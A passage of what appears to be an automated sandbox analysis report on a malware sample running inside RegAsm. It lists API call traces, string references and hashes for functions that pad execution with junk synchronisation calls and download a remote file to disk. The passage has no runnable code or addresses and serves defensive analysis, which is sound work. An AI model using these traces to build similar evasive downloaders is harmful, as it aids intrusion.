t9kx5wueg, xrefs: 0040F1A3
MTXid6eg7kl, xrefs: 0040F0D9
ev_n39w6qzp, xrefs: 0040F0B8

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$DebugOutputString$ErrorFindLastMutexReleaseSemaphoreTimerWaitable$CloseEnvironmentEventFileLocalVariable$AllocCancelChangeFreeMappingNotificationlstrlen$FirstGlobalOpenReset
String ID: 54dhluqg$87xo3fjd$MTXdxglk35i$MTXid6eg7kl$SMPHR_qjkqlbwl$WTMR_b67hznar$WTMR_pg3esy2g$XMLamfolgz0$b4j4f6xx$ev_n39w6qzp$jcezxitk$kswx2kex$mjtppkej$regwog66qaw$s_t4ckbkwe$t1v6z4di9$t26t01mzg$t7fwgbo5x$t9kx5wueg$tv49i65z7
API String ID: 1802845229-2560767515
Opcode ID: b76ec184953812a59086e8b359a0a5680b3fda753aa7ad5c655f3d90c0208f22
Instruction ID: 8ff221f86da20beec2bde5ea451d711bc06f1952f8edd64612603dbb9fe3ce86
Opcode Fuzzy Hash: b76ec184953812a59086e8b359a0a5680b3fda753aa7ad5c655f3d90c0208f22
Instruction Fuzzy Hash: AA516475F40354BBD7206BE0DC89FDE7F68AB88B91F114072F705A65E0CAB85D808A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC49 Relevance: 89.4, APIs: 31, Strings: 20, Instructions: 157
timeregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000001,regduvy6vjh,00000000,00020019,?,771A9350,771A7CD0,771C4B60), ref: 0040DC6C
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iel5vn6f), ref: 0040DC7B
GetLastError.KERNEL32 ref: 0040DC89
CancelWaitableTimer.KERNEL32(00000000), ref: 0040DC8C
FindFirstFileA.KERNEL32(s_4o4wkk8x,?), ref: 0040DC9E
FindClose.KERNEL32(00000000), ref: 0040DCA5
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0ps9kk75), ref: 0040DCB6
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCC1
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_co8m4cgj), ref: 0040DCD2
SetEvent.KERNEL32(00000000), ref: 0040DCDB
ResetEvent.KERNEL32(00000000), ref: 0040DCE2
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_yqgz522c), ref: 0040DCF3
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCFE
GetLastError.KERNEL32 ref: 0040DD08
CreateMutexA.KERNEL32(00000000,00000000,MTXphqqzlgp), ref: 0040DD13
OutputDebugStringA.KERNEL32(ttljfcwbf), ref: 0040DD24
ReleaseMutex.KERNEL32(00000000), ref: 0040DD2B
SetEnvironmentVariableA.KERNEL32(8b5m7j2t,j365hmj6), ref: 0040DD3B
SetEnvironmentVariableA.KERNEL32(pogkjh2o,ud8qanm7), ref: 0040DD53
SetEnvironmentVariableA.KERNEL32(6ajv6zs7,1ozgzhys), ref: 0040DD5F
lstrlenA.KERNEL32(d1fc95c6179be4b0b4f93eff6ab3f08f), ref: 0040DD84
FindFirstFileA.KERNEL32(s_knj6a81k,?), ref: 0040DDB7
FindClose.KERNEL32(00000000), ref: 0040DDBE
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ksisnpxu), ref: 0040DDCF
RegOpenKeyExA.ADVAPI32(80000001,reg5pqwtshe,00000000,00020019,?), ref: 0040DDEB
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DDF5
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sh8nllc8), ref: 0040DE03
CancelWaitableTimer.KERNEL32(00000000), ref: 0040DE0E
OutputDebugStringA.KERNEL32(tv82wggk6), ref: 0040DE19
GetLastError.KERNEL32 ref: 0040DE1F
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,000003F2,00000000), ref: 0040DE31

Strings

WTMR_iel5vn6f, xrefs: 0040DC72
s_4o4wkk8x, xrefs: 0040DC99
s_knj6a81k, xrefs: 0040DDB2
SMPHR_ksisnpxu, xrefs: 0040DDC4
MTXphqqzlgp, xrefs: 0040DD0A
WTMR_sh8nllc8, xrefs: 0040DDFB
ud8qanm7, xrefs: 0040DD49
SMPHR_yqgz522c, xrefs: 0040DCE8
pogkjh2o, xrefs: 0040DD4E
ev_co8m4cgj, xrefs: 0040DCC7
1ozgzhys, xrefs: 0040DD55
6ajv6zs7, xrefs: 0040DD5A
j365hmj6, xrefs: 0040DD31
8b5m7j2t, xrefs: 0040DD36
XML0ps9kk75, xrefs: 0040DCAB
regduvy6vjh, xrefs: 0040DC60
reg5pqwtshe, xrefs: 0040DDE1
ttljfcwbf, xrefs: 0040DD1F
d1fc95c6179be4b0b4f93eff6ab3f08f, xrefs: 0040DD7F
tv82wggk6, xrefs: 0040DE14

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$Semaphore$FindReleaseTimerWaitable$EnvironmentErrorEventFileLastVariable$CancelCloseDebugFirstMutexOpenOutputString$MappingResetlstrlen
String ID: 1ozgzhys$6ajv6zs7$8b5m7j2t$MTXphqqzlgp$SMPHR_ksisnpxu$SMPHR_yqgz522c$WTMR_iel5vn6f$WTMR_sh8nllc8$XML0ps9kk75$d1fc95c6179be4b0b4f93eff6ab3f08f$ev_co8m4cgj$j365hmj6$pogkjh2o$reg5pqwtshe$regduvy6vjh$s_4o4wkk8x$s_knj6a81k$ttljfcwbf$tv82wggk6$ud8qanm7
API String ID: 3259851296-617801294
Opcode ID: be6ab2c12df9f5e642702d95afd0ccde8d9c351724caa074a05ef93a360aa40a
Instruction ID: bda606bece26ea8c1538e09a1e2a9020e0ff3cca074c005c4388e99aa4674c8b
Opcode Fuzzy Hash: be6ab2c12df9f5e642702d95afd0ccde8d9c351724caa074a05ef93a360aa40a
Instruction Fuzzy Hash: 01515475F80354BBE7105BA09C8EFDA3F68AB0CB86F104062F705E65E1D6A85AC4876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB7B Relevance: 66.6, APIs: 25, Strings: 13, Instructions: 132
timememoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,ev_t0ff7ckr,00000000,00000000,00000000), ref: 0040EB9A
SetEvent.KERNEL32(00000000), ref: 0040EBA3
ResetEvent.KERNEL32(00000000), ref: 0040EBAA
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLydhp8k1n), ref: 0040EBB9
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EBC3
OutputDebugStringA.KERNELBASE(tt3c7c6fy), ref: 0040EBCE
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ngcgpumk), ref: 0040EBDC
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EBED
SetEnvironmentVariableA.KERNEL32(t24qar9z,4jdvksst), ref: 0040EBF9
FindFirstFileA.KERNEL32(s_7wz467a6,?), ref: 0040EC0B
FindClose.KERNEL32(00000000), ref: 0040EC12
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000001C2,00000000), ref: 0040EC26
OutputDebugStringA.KERNELBASE(trucacvw6), ref: 0040EC33
CloseHandle.KERNEL32(00000000), ref: 0040EC3A
SetEnvironmentVariableA.KERNEL32(suq142v5,byihy5ld), ref: 0040EC4A
LocalAlloc.KERNEL32(00000000,00000446), ref: 0040EC57
LocalFree.KERNEL32(00000000), ref: 0040EC5E
OutputDebugStringA.KERNEL32(tq6azztln), ref: 0040EC69
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_dnq6ya3g), ref: 0040EC78
CancelWaitableTimer.KERNEL32(00000000), ref: 0040EC7F
GetLastError.KERNEL32 ref: 0040EC84
CreateSemaphoreA.KERNEL32(00000002,00000002,00000001,SMPHR_bssx0b6b), ref: 0040EC98
ReleaseSemaphore.KERNEL32(00000000,00000001,00000002), ref: 0040ECA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040ECC2
LocalFree.KERNEL32(00000000), ref: 0040ED00

Strings

SMPHR_bssx0b6b, xrefs: 0040EC8F
WTMR_ngcgpumk, xrefs: 0040EBD4
tt3c7c6fy, xrefs: 0040EBC9
s_7wz467a6, xrefs: 0040EC06
tq6azztln, xrefs: 0040EC64
byihy5ld, xrefs: 0040EC40
t24qar9z, xrefs: 0040EBF4
trucacvw6, xrefs: 0040EC2C
suq142v5, xrefs: 0040EC45
XMLydhp8k1n, xrefs: 0040EBB0
WTMR_dnq6ya3g, xrefs: 0040EC6F
4jdvksst, xrefs: 0040EBEF
ev_t0ff7ckr, xrefs: 0040EB87

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$LocalSemaphoreTimerWaitable$DebugEventOutputString$AllocCancelCloseEnvironmentFileFindFreeReleaseVariable$ErrorFirstHandleLastMappingReset
String ID: 4jdvksst$SMPHR_bssx0b6b$WTMR_dnq6ya3g$WTMR_ngcgpumk$XMLydhp8k1n$byihy5ld$ev_t0ff7ckr$s_7wz467a6$suq142v5$t24qar9z$tq6azztln$trucacvw6$tt3c7c6fy
API String ID: 3763755744-752573125
Opcode ID: deda0546989f5746559434f21b6895729527d1026305a39062c01c5a602d5163
Instruction ID: e378412a4146621b479b5594e62283f9f5d6cdb1d6790918a022ec3644d0d37a
Opcode Fuzzy Hash: deda0546989f5746559434f21b6895729527d1026305a39062c01c5a602d5163
Instruction Fuzzy Hash: 65417435A40250BBD7205BA1DD4DFEE3F78EF8D751F118426F705E65A0CB7849808769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F75C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,00000101), ref: 0040F77D

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 08cf979ebd00a15239af198ff7f342cfe0d522d9cb4e190fcbc85bbecc828234
Instruction ID: a61f80a832611778e7cd8e7972bbe72dccd38ef68115f5f73051dee31061c24a
Opcode Fuzzy Hash: 08cf979ebd00a15239af198ff7f342cfe0d522d9cb4e190fcbc85bbecc828234
Instruction Fuzzy Hash: F0D05E72600218FBD70097C8DC09ECE7AECEB48750F004061F605E3281D6B49E0087E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFF8 Relevance: 59.6, APIs: 23, Strings: 11, Instructions: 133
synchronizationregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_lsu5ct24), ref: 0040E00E
SetEnvironmentVariableA.KERNEL32(90qhk0la,gcxcekb0), ref: 0040E026
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E02C
RegOpenKeyExA.ADVAPI32(80000001,regyb7u5h3g,00000000,00020019,?), ref: 0040E04B
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_0cg1eief), ref: 0040E05B
SetEvent.KERNEL32(00000000), ref: 0040E064
ResetEvent.KERNEL32(00000000), ref: 0040E06B
LocalAlloc.KERNEL32(00000000,00000F4A), ref: 0040E078
SetEnvironmentVariableA.KERNEL32(qdicnr9r,3nwiu8k2), ref: 0040E08A
LocalFree.KERNEL32(00000000), ref: 0040E08D
OutputDebugStringA.KERNEL32(tf8mzzkut), ref: 0040E09E
CreateMutexA.KERNEL32(00000000,00000000,MTXs0ri916b), ref: 0040E0A9
OutputDebugStringA.KERNEL32(tugcgipbn), ref: 0040E0BA
ReleaseMutex.KERNEL32(00000000), ref: 0040E0BD
GetLastError.KERNEL32 ref: 0040E0C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_0v14vxe0), ref: 0040E0D4
GetCurrentProcess.KERNEL32(00000008,?), ref: 0040E0E9
OpenProcessToken.ADVAPI32(00000000), ref: 0040E0F0
GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0040E107
GetLastError.KERNEL32 ref: 0040E10D
GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0040E138
lstrcmpiW.KERNEL32(?), ref: 0040E160
GlobalFree.KERNEL32(00000000), ref: 0040E168

Strings

regyb7u5h3g, xrefs: 0040E041
3nwiu8k2, xrefs: 0040E07E
tf8mzzkut, xrefs: 0040E099
gcxcekb0, xrefs: 0040E01C
WTMR_0v14vxe0, xrefs: 0040E0CB
qdicnr9r, xrefs: 0040E083
tugcgipbn, xrefs: 0040E0B5
90qhk0la, xrefs: 0040E021
SMPHR_lsu5ct24, xrefs: 0040E001
ev_0cg1eief, xrefs: 0040E051
MTXs0ri916b, xrefs: 0040E0A0

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventToken$DebugEnvironmentErrorFreeInformationLastLocalMutexOpenOutputProcessReleaseSemaphoreStringVariable$AllocCurrentGlobalResetTimerWaitablelstrcmpi
String ID: 3nwiu8k2$90qhk0la$MTXs0ri916b$SMPHR_lsu5ct24$WTMR_0v14vxe0$ev_0cg1eief$gcxcekb0$qdicnr9r$regyb7u5h3g$tf8mzzkut$tugcgipbn
API String ID: 1996575405-4192329849
Opcode ID: 84826d7ce7ec4e16c5f4bd58609b17f49f724890782c6bcfa681018ba10ebfc6
Instruction ID: 7168791fe35a70627c961e9e90ef7ec4f5f8b875fdf92052aaea41076284f879
Opcode Fuzzy Hash: 84826d7ce7ec4e16c5f4bd58609b17f49f724890782c6bcfa681018ba10ebfc6
Instruction Fuzzy Hash: 1E417036A40215FFD7109FE19D49FDA3F78EB49B41F108476F601B21A0D6789A408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DED0 Relevance: 57.9, APIs: 20, Strings: 13, Instructions: 105
timeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_mrotc31v), ref: 0040DEE3
OutputDebugStringA.KERNEL32(txyxulc7k,?,?,?,00409D36), ref: 0040DEF6
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,?,?,00409D36), ref: 0040DEFC
RegOpenKeyExA.KERNEL32(80000001,regez2y9jfa,00000000,00020019,?,?,?,?,00409D36), ref: 0040DF21
OutputDebugStringA.KERNEL32(tgfs7wgt3,?,?,?,00409D36), ref: 0040DF2A
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_6ltrvjqq,?,?,?,00409D36), ref: 0040DF37
SetEvent.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF40
ResetEvent.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF47
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zqpogtvp), ref: 0040DF56
RegOpenKeyExA.KERNEL32(80000001,regl5f123p6,00000000,00020019,?,?,?,?,00409D36), ref: 0040DF73
CancelWaitableTimer.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DF80
OutputDebugStringA.KERNEL32(tcdimqv7r,?,?,?,00409D36), ref: 0040DF89
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_7t7rrqol), ref: 0040DF94
OutputDebugStringA.KERNEL32(txuqs45db,?,?,?,00409D36), ref: 0040DFA1
CancelWaitableTimer.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DFA4
OutputDebugStringA.KERNEL32(thtujb8qu,?,?,?,00409D36), ref: 0040DFAB
LocalAlloc.KERNEL32(00000000,000009B1,?,?,?,00409D36), ref: 0040DFB5
OutputDebugStringA.KERNEL32(tt163rq13,?,?,?,00409D36), ref: 0040DFC2
LocalFree.KERNEL32(00000000,?,?,?,00409D36), ref: 0040DFC5
CreateMutexW.KERNEL32(00000000,00000000,stasvasbas,?,?,?,00409D36), ref: 0040DFE6

Strings

tt163rq13, xrefs: 0040DFBB
regez2y9jfa, xrefs: 0040DF17
WTMR_zqpogtvp, xrefs: 0040DF4D
tgfs7wgt3, xrefs: 0040DF25
SMPHR_mrotc31v, xrefs: 0040DED8
txyxulc7k, xrefs: 0040DEF1
regl5f123p6, xrefs: 0040DF69
thtujb8qu, xrefs: 0040DFA6
stasvasbas, xrefs: 0040DFD1, 0040DFD6, 0040DFE3
ev_6ltrvjqq, xrefs: 0040DF2C
tcdimqv7r, xrefs: 0040DF84
WTMR_7t7rrqol, xrefs: 0040DF8B
txuqs45db, xrefs: 0040DF9A

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Create$TimerWaitable$Event$CancelLocalOpenSemaphore$AllocFreeMutexReleaseReset
String ID: SMPHR_mrotc31v$WTMR_7t7rrqol$WTMR_zqpogtvp$ev_6ltrvjqq$regez2y9jfa$regl5f123p6$stasvasbas$tcdimqv7r$tgfs7wgt3$thtujb8qu$tt163rq13$txuqs45db$txyxulc7k
API String ID: 1152674414-3755437473
Opcode ID: 504f97075363ed1f6cdb6da0dad17a3ce4cb5d842dc6b9c9f596395956721023
Instruction ID: 3a69443e8b0ce763214c634665d92984800993c347feead3620fa9dc3b437091
Opcode Fuzzy Hash: 504f97075363ed1f6cdb6da0dad17a3ce4cb5d842dc6b9c9f596395956721023
Instruction Fuzzy Hash: 83219935B843547FE6206BA05C8AFEB3D5CDB48B96F114032FB05B51D2E6E89D80857D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCBF Relevance: 22.7, APIs: 18, Instructions: 247
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BCE0
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD25
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040BD40
LocalFree.KERNEL32(?), ref: 0040BE97
LocalFree.KERNEL32(?), ref: 0040BEA5
LocalFree.KERNEL32(00000000), ref: 0040BEBC
LocalFree.KERNELBASE(00000000), ref: 0040BEC7
LocalFree.KERNELBASE(00000000), ref: 0040BED2
LocalFree.KERNEL32(00000000), ref: 0040BF02
LocalFree.KERNEL32(?), ref: 0040BF18
LocalFree.KERNEL32(?), ref: 0040BF30
LocalFree.KERNEL32(00000000), ref: 0040BF3F
LocalFree.KERNEL32(00000000), ref: 0040BF4A
LocalFree.KERNEL32(00000000), ref: 0040BF55
LocalFree.KERNEL32(?), ref: 0040BF67
LocalFree.KERNEL32(00000000), ref: 0040BF76
LocalFree.KERNEL32(00000000), ref: 0040BF85

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID:
API String ID: 3098330729-0
Opcode ID: f1061dd4ab24fad85eb1f72055322928f09a07e4f668157ed4fe6901f1be58be
Instruction ID: d426cc0ec6e2fbc0d71ee9e827e17f567b9ab60ab20955ec0f64d222a8285b76
Opcode Fuzzy Hash: f1061dd4ab24fad85eb1f72055322928f09a07e4f668157ed4fe6901f1be58be
Instruction Fuzzy Hash: D8812371A00606DBDB149BA5DC85AEF7BB5FB88700B14847AE915F3390DB789D009BEC

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAF9 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 134
filenetworkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00000000), ref: 0040BB87
InternetOpenUrlW.WININET(0000002F,?,0040BE8E,00000000), ref: 0040BBD8
CreateFileW.KERNEL32(0040BE8E,40000000,00000000,00000000,00000002,08000000,00000000), ref: 0040BBFA
InternetReadFile.WININET(00000000,?,00000800,0000002F), ref: 0040BC1A
WriteFile.KERNEL32(00000000,?,00000000,00000073,00000000), ref: 0040BC3A
InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 0040BC56
LocalFree.KERNEL32(00000000), ref: 0040BC5D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040BC6B
LocalFree.KERNEL32(00000000), ref: 0040BC72

Strings

s, xrefs: 0040BBAA
/, xrefs: 0040BB5D
MrBidenNeverKnow, xrefs: 0040BB98

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Internet$FreeLocalRead$ChangeCloseCreateFindNotificationOpenWritelstrlen
String ID: /$MrBidenNeverKnow$s
API String ID: 1040460322-530527598
Opcode ID: ce2d80fdc12d3dc36e2315849c6dc5cd4829747b08fb00d41075e1891cc61fa1
Instruction ID: 896319c6afa3528012f23cef34ff71f049749deff51ff49bef5061a5860f1f90
Opcode Fuzzy Hash: ce2d80fdc12d3dc36e2315849c6dc5cd4829747b08fb00d41075e1891cc61fa1
Instruction Fuzzy Hash: A9419E71900605FEEB14ABA4CC45FFB77B8EB88304F10C169E515A7190EB74AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC7D Relevance: 1.3, APIs: 1, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,0000FF78,00000000,0040A4B6), ref: 0040BC8C

Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,771B2F20), ref: 0040F02F
Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F034
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,771B2F20), ref: 0040F06C
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F073
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,771B2F20), ref: 0040F07F
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F08D
Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F090
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0A5
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,771B2F20), ref: 0040F0B6
Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,771B2F20), ref: 0040F0C3
Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0CC
Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F0D3
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,771B2F20), ref: 0040F0E2
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,771B2F20), ref: 0040F0FF
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,771B2F20), ref: 0040F104
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,771B2F20), ref: 0040F114
Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F139
Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F140
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,771B2F20), ref: 0040F14B

Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F118
Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,771B2F20), ref: 0040F150
Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,771B2F20), ref: 0040F165
Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F16C
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,771B2F20), ref: 0040F177
Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,771B2F20), ref: 0040F185
Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F18C
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,771B2F20), ref: 0040F1AA
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1B7
Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,771B2F20), ref: 0040F1C7
Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,771B2F20), ref: 0040F1E0
Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,771B2F20), ref: 0040F1E7
Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,771B2F20), ref: 0040F1F0
Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,771B2F20), ref: 0040F1FB
Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,771B2F20), ref: 0040F223
Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C

Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,771B2F20), ref: 0040F217

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$DebugOutputString$ErrorFindLastLocalMutexReleaseSemaphoreTimerWaitable$AllocCloseEnvironmentEventFileVariable$CancelChangeFreeMappingNotificationlstrlen$FirstGlobalOpenReset
String ID:
API String ID: 2403692898-0
Opcode ID: eade2d08b486bb26c26d340f54477285402d9572752300a54ecd5ed044db8028
Instruction ID: 8810a4085a764086b3fc151d5a27c17ae9af842525b4396e58949895209dc749
Opcode Fuzzy Hash: eade2d08b486bb26c26d340f54477285402d9572752300a54ecd5ed044db8028
Instruction Fuzzy Hash: 65E08634300110C7CA24FB70EC959ED639277C8300710C53A5541577C2CA79AC06679C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040F788 Relevance: 180.6, APIs: 68, Strings: 35, Instructions: 309timeregistrysynchronizationCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
GetLastError.KERNEL32 ref: 0040F7AD
LocalFree.KERNEL32(00000000), ref: 0040F7B0
RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
SetEvent.KERNEL32(00000000), ref: 0040F7E2
ResetEvent.KERNEL32(00000000), ref: 0040F7E9
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
